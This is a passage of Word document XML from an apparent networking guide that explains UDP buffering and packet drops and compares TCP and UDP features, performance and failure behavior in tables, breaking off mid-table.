    <w:p w14:paraId="249259B6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1380"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Kernel immediately sends (or queues briefly in NIC buffer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8857E3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1380"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>If NIC buffer is full: sendto() may block or return error (depending on socket options).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A05EDB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1380"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No send buffer needed (no retransmission → no need to keep sent data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D63C4A9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Receive path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677C5DB6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1381"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Kernel has a per-socket receive buffer (SO_RCVBUF, default ~128 KB on Linux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2923F28C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1381"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Incoming datagrams are queued in this buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631CC01F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1381"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>If buffer is full when a new datagram arrives → </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>datagram is silently dropped</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> (no error to sender, no notification).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6103483E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1381"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Application must recvfrom() fast enough to prevent buffer overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F74A57" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implication for system design:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Under burst traffic, a UDP receiver WILL drop packets if it can't keep up. The application must either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEBC0F4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Process fast enough (pin to dedicated cores, use DPDK for kernel bypass).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1155FFD9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Accept loss (real-time media — dropped frame is better than delayed frame).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B44EBF2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Buffer at application level and process asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C5AAA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="7083BFCC">
          <v:rect id="_x0000_i5016" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CEE4A0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Side-by-Side Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C25C928" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Feature Comparison</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3108"/>
        <w:gridCol w:w="3213"/>
        <w:gridCol w:w="3029"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="12F4213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A2E742" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Feature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8EC61C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TCP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531908" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="2431D10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AB4EF7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Connection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01299A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Connection-oriented (handshake)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A5EAEA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Connectionless</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="07E9DCF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2DA27C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Reliability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BF42D1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Guaranteed delivery (retransmission)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73289D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>No guarantee (best-effort)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="2117C9E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CE9F9C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Ordering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CE0022" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Guaranteed in-order delivery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E7F7BD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>No ordering guarantee</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="38D07F7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A97E42" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Duplicate detection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5D6D91" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Sequence numbers prevent duplicates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410101" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>No duplicate detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="4D90C9C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B60A76" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Flow control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BC26BD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Receive window (receiver-driven)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26DA47" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="28A37BB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99DE63" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Congestion control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F568EA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>CUBIC/BBR/Reno (network-friendly)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C69088" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>None (application must implement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="2E3130D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CEBC55" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Message boundaries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1BC4F8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>No (byte stream)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6051DB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Yes (datagram boundaries preserved)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="5B18D68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2AE8A4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Header size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2BBB2F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>20–60 bytes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B8F196" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>8 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="14F452F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EB5E2C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:lastRenderedPageBreak/>
              <w:t>Connection state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88A95A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Per-connection state in kernel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D5ED0F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Stateless</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="241ECFD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1F5A2A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Startup latency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D3034E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>1 RTT minimum (handshake)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329F88" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>0 RTT (send immediately)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="5E6477B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19389C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Broadcasting/Multicasting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9DA504" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Not supported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D07D51" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="68552D3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51D23E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Max segment size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FB6CCB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Negotiated (MSS, typically 1460 bytes)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895A2D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Up to 65,507 bytes (practical: ≤ MTU)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26B37729" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Performance Characteristics</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2467"/>
        <w:gridCol w:w="3190"/>
        <w:gridCol w:w="3693"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="40D5BEA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EF28E0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Metric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FFF011" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TCP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A99C15" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="15E6425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FFCB3B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>First-byte latency (new connection)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2489FA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>1–2 RTT (handshake + TLS)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CDF2BE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>0 RTT (immediate send)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="49C6540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8B9284" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Throughput (bulk transfer)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80B16A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Optimal (congestion control fills pipe)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22F2B9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Potentially higher (no congestion control overhead) but risks collapse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="55840AA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93ADC5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Latency under packet loss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7E551B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Increases (retransmission + HOL blocking)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93ADEB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Unaffected (lost packets are just gone)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="2C0E858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99934A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Jitter (latency variance)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B469EE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>High (retransmission delays vary)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50A674" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Low (each packet is independent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="2F854ED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269B7C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>CPU overhead per packet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27CA67" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Higher (state tracking, timers, ACK processing)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8C898A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Lower (minimal processing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="27755D3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2E9AE6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Memory per connection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F928A6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>~400–1000 bytes kernel state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991988" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>None (stateless)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="1475B5F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859C2F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:lastRenderedPageBreak/>
              <w:t>Max connections per server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C5A06D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Limited by memory/file descriptors (~1–10 million)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A837EA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Unlimited (no per-connection state)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02D2BA26" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Failure Behavior</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2272"/>
        <w:gridCol w:w="3295"/>
        <w:gridCol w:w="3783"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="01FC91F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3BE91E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scenario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6B0F46" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TCP Behavior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35C613" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A51E9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>UDP Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="14ACB86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79242C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
